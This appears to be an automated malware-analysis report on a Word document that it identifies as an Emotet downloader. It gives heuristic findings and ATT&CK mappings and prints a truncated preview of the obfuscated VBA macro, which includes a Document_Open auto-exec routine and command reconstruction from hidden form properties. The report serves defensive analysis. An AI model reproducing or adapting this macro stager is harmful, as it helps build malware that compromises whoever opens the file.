MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains a VBA macro within the Document_Open subroutine, which is a common technique for Emotet. The macro utilizes CreateObject and hidden UserForm properties to execute code, indicating a downloader functionality. ClamAV detection further confirms its malicious nature and identifies it as Emotet.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7464435-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464435-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8532 bytes |
SHA-256: bf396ac7637f2679d965ae7af889f527da30942df2f8e52d49de8f993852af9b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Honkioltjg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Krqadtuqa, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Vyfnrlnd = Eovirwcctpvbn To Gcezsexcitbo
Ysnpcjhbsash = Kgulmtkjj
Rglnpqhdh = Illjmfkdglqss
Next
Select Case Pbfkpjilkcwnc
Case jhghff
Dgknyiacgf = CSng(Hex(Ytaosmpbf))
Fnaaahqrhtvhj = CDate(Uzpcb0lU * CDate(Drozzepdk))
Ndbnjfgjfz = Avqnsmcmq
Jxmgyspkqip = 34
Qtkqaabffjn = Rxqhftfpsp
End Select
For Nrjcrxarnvzo = Atdabbufpix To Ijfqmmuznptw
Qgwgphmjnpek = Icaeqcsiifmcu
Dkefidztci = Yvqlbevrl
Next
Select Case Ftaiyqtmnxx
Case jhghff
Afzviiyvy = CSng(Hex(Nrtkyyxaovyl))
Aciwfkalllwe = CDate(Uzpcb0lU * CDate(Crshzgvgx))
Pzxviburaig = Sjtbghotxpxxd
Cztfaiqldp = 34
Cnaawbsopn = Puurkzyf
End Select
For Ijqgrzvzx = Ggpcpiyfp To Xhtmlsrp
Rstmreivalmc = Fgdjjksovfl
Fncihvjpov = Epjoyruidgfoh
Next
Select Case Cdwoaircixde
Case jhghff
Brknlfujzxo = CSng(Hex(Jyhoabbg))
Hppmmbrvmntb = CDate(Uzpcb0lU * CDate(Avbztdzzjiie))
Cdgipzdyws = Ibcdhhjln
Bnhshfhe = 34
Hsihklqrczirl = Xfbaupvxdeuhg
End Select
Mfpclrruyofr
End Sub
Attribute VB_Name = "Sgrjzpohzof"
Attribute VB_Base = "0{C2893102-5799-4E36-885F-E455A4795C97}{101BFAD4-8B58-4BDF-95D4-63114057CB0C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xvlsgerp"
Function Mzkcdughk()
For Obctixiyjp = Eefyppymrw To Nasechdhlajom
Ijlpmtpovl = Bcnussefhfd
Mtxeurmt = Cghvdymwttr
Next
Select Case Yfrviqdcf
Case jhghff
Aarjatwwxmk = CSng(Hex(Wahujkblko))
Dwedznwquvdhd = CDate(Uzpcb0lU * CDate(Xuesnrgyhjjtv))
Plrkxxss = Nyqbwzrnleqfw
Wxwuqtbbr = 34
Ptycecgtatqx = Rgkjmkpfba
End Select
Etqstimht = Honkioltjg.Krqadtuqa
For Hkqqefczs = Usybeymbuspmx To Daczbvdwlpkj
Erqgrczrxc = Uwprystjbcwt
Qvmltojr = Zfguumca
Next
Select Case Bhhtrrqsi
Case jhghff
Wppleelizkdg = CSng(Hex(Smyopzwijain))
Cxriofcprjqh = CDate(Uzpcb0lU * CDate(Lxxbtbzfsdtc))
Gocqlrfbtur = Cuoyhidwmch
Uwenomgoidga = 34
Mkddjklwldfmt = Ulvvuwiwfgfb
End Select
Auchuplrztc = Etqstimht + Sgrjzpohzof.Oxfwxcpevhsie + Sgrjzpohzof.Zaddwmsuhwnzp + Sgrjzpohzof.Acmmrcev
For Bgnsofgsasr = Wuymrfoh To Ekqbfqvcf
Dsjbvahgjkb = Zxhpjbtizxjh
Bcfqlnnt = Kwfhbtycdwc
Next
Select Case Gsemheuatw
Case jhghff
Eduquggus = CSng(Hex(Vmggzhecast))
Hafphnrziaxpe = CDate(Uzpcb0lU * CDate(Pwnpcfizax))
Ouwnkfwitbrn = Nnmjqvvvme
Wryafrmu = 34
Mmmkhdpof = Psvnrgzyti
End Select
Pskxhvfrug = Auchuplrztc + Sgrjzpohzof.Lnjiddnuzjszn + Sgrjzpohzof.Iarazuvin
For Grdpiatkaqvn = Rbvlrkpk To Xordvahd
Wwxryenfoxgzc = Dqnsvevearujq
Jrjeeuddnnxkw = Ylwdrjtlitarx
Next
Select Case Uxqooopx
Case jhghff
Zmzfxuzpd = CSng(Hex(Nmxqpgble))
Ejszthaii = CDate(Uzpcb0lU * CDate(Yrwtgkzbc))
Whktxzhom = Tiqmyaro
Ugofuvarlc = 34
Ynloajbbubv = Ndtlyjnyvbbwo
End Select
Mzkcdughk = Eqixjigahmlpu + Pskxhvfrug + Eqixjigahmlpu
For Cpsmlxdtqdi = Gnybdvidljyk To Qtauusmoyvd
Ovaktcflfy = Hjkqfubhjn
Inuirocyykt = Yeiyckvblm
Next
Select Case Ysbbxbbv
Case jhghff
Giwtqvbl = CSng(Hex(Cfgptigceox))
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.